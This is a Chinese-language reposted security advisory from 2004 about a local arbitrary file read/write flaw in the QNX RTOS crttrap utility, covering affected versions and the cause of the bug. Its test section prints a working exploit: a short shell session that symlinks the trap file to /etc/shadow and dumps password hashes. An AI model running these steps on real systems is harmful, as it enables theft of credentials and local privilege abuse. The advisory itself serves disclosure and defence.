QNX crrtrap任意文件读/写漏洞

发布日期：2004-12-29
更新日期：2004-12-30

受影响系统：

QNX RTOS 6.2.0 Update Patch A
QNX RTOS 6.2.0
QNX RTOS 6.1.0
QNX RTOS 4.25
QNX RTOS 2.4

描述：

---

BUGTRAQ ID: 12123

QNX RTOS是一款设计用于嵌入系统的实时操作系统。

QNX crrtrap在处理'-c'参数时存在问题，本地攻击者可以利用这个漏洞读/写任意文件。

crrtrap用于检查显卡硬件，启动正确的驱动，crrtrap '-c'标记指定那个trap文件会被写，组合'trap'标记可能写硬盘上任意文件。

默认crttrap读写"/etc/system/config"中的trap文件，其中对目录进行了写限制，并过滤"../"，不过由于没有检查"/"可导致绕过保护，通过建立子目录获得读/写权限，并操作我们自己的trap文件。这样可以利用此问题读/写系统的任意文件。

<*来源：Julio Cesar Fort （julio@rfdslabs.com.br）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110434382928609&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Julio Cesar Fort （julio@rfdslabs.com.br）提供了如下测试方法：

$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

建议：

---

厂商补丁：

QNX
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.qnx.com/

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有